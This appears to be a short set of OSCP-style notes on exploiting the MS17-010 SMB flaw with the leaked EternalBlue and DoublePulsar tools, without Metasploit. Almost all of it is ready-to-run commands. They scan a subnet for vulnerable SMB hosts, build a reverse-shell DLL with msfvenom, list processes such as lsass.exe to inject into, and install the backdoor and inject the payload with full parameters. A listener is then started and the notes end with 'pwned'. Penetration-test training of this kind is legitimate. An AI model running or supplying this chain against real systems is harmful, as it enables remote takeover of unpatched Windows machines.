Eternal-pulsar (ms17-010)
Eternalblue-Doublepulsar without Metasploit and Python (FuzzBunch_notes)
base on shadowbroker's exploit (fuzzbunch)
- you can run it on windows or linux (need wine)
Find smb vulns in a network range.
nmap -A -p 139,445 10.1.1.1-254 -oG smb_service.txt
cat smb_service.txt | grep -i windows | cut -d" " -f2 > smb_machines.txt
for vul in $(find / -name smb*vuln*.nse | cut -d"/" -f 6); do nmap -v -p 139,445 --script=$vul -iL smb_machines.txt -oN smb_vulns_$vul.txt; done
Create payload with msfvenom (staged)
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f dll > shell.dll
you can also use other payloads windows/shell_reverse_tcp (stageless), windows/meterpreter/reverse_tcp
ProcessName list to inject
lsass.exe (x64)
wlms.exe (x86)
svchost.exe
explorer.exe
spoolsv.exe
EternalBlue & Doublepulsar (--help )
Backdoor Install with EternalBlue
Eternalblue-2.2.0.exe --TargetIp 10.10.10.10 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 1.txt
Sending shellcode to inject DLL with Doublepulsar
Doublepulsar-1.3.1.exe --OutConfig 2.txt --TargetIp 10.10.10.10 --TargetPort 445 --DllPayload shell.dll --DllOrdinal 1 --ProcessName svchost.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
multi/handler listening with msf
msfconsole -q -r msfhandler.rc
pwned !!!
Thanks for watching here !!!
I hope this will help you in your oscp journey .